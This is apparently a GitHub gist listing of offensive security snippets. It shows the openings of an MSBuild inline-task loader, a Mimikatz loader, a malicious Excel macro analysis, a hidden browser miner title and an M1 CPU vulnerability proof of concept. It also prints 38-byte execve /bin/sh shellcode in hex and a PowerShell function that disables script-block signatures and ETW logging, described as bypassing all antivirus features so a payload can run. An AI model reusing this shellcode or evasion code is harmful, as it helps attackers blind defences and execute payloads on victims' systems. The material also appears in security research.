0x25bit
/ msbuild_ghostpack_seatbelt.txt
Created
March 24, 2019 13:20
— forked from curi0usJack/msbuild_ghostpack_seatbelt.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="NotSubTee"> | |
| <BusinessTime /> | |
| </Target> | |
| <UsingTask | |
| TaskName="BusinessTime" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <ParameterGroup/> | |
| <Task> |
0x25bit
/ execve.c
Created
April 3, 2019 08:27
— forked from resilar/execve.c
Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes) | |
| * 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800 | |
| * | |
| * - offset - bytes 32-bit code 64-bit code | |
| * 0x00000000 31c0 xor eax, eax xor eax, eax | |
| * 0x00000002 50 push eax push rax | |
| * 0x00000003 48 dec eax rex.w | |
| * 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp] | |
| * 0x00000007 eb10 jmp 0x19 jmp 0x19 |
0x25bit
/ messages.c
Created
September 6, 2019 10:42
— forked from taviso/messages.c
Enumerating Windows Messages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #pragma comment(lib, "USER32") | |
| FARPROC NtUserPostMessage; | |
| BOOL CALLBACK QueryWindowMessageProc(HWND Window, LPARAM Param) | |
| { |
0x25bit
/ a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
Created
November 13, 2019 02:45
— forked from JohnLaTwC/a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
VBA Excel Macro threat PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- |
0x25bit
/ Tasks.cs
Created
December 27, 2019 13:07
— forked from Ridter/Tasks.cs
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
0x25bit
/ OneDoesNotSimplyBypassEntireWinDefender.ps1
Created
May 3, 2021 22:07
Do you wanna bypass all AVs features that will stops you from running your juicy-juicy powershell payload in only ONE script and without Administrators privilege? Than you're in the right place !
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # this script can bypass all AVs features that will stop you from running your juicy-juicy powershell payload REFLECTIVELY | |
| # run this script before running your payload,and make sure that its runned on the same session! | |
| # DONT COMBINE THIS SCRIPT WITH YOUR PAYLOAD,OTHERWISE IT WILL NOT WORK!!! | |
| # you dont need to invoke the function again! | |
| function Invoke-OneDoesNotSimplyBypassEntireWinDefender { | |
| [ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])) | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) | |
| $increment = 0 | |
| $maxincrement = 30000000 | |
| For ($increment=0; $increment -lt $maxincrement;$increment++) { $increment++ } |
0x25bit
/ HiddenBrowserMiner.cs
Created
May 12, 2021 04:50
0x25bit
/ m1racles-poc.c
Created
May 28, 2021 05:07
— forked from marcan/m1racles-poc.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |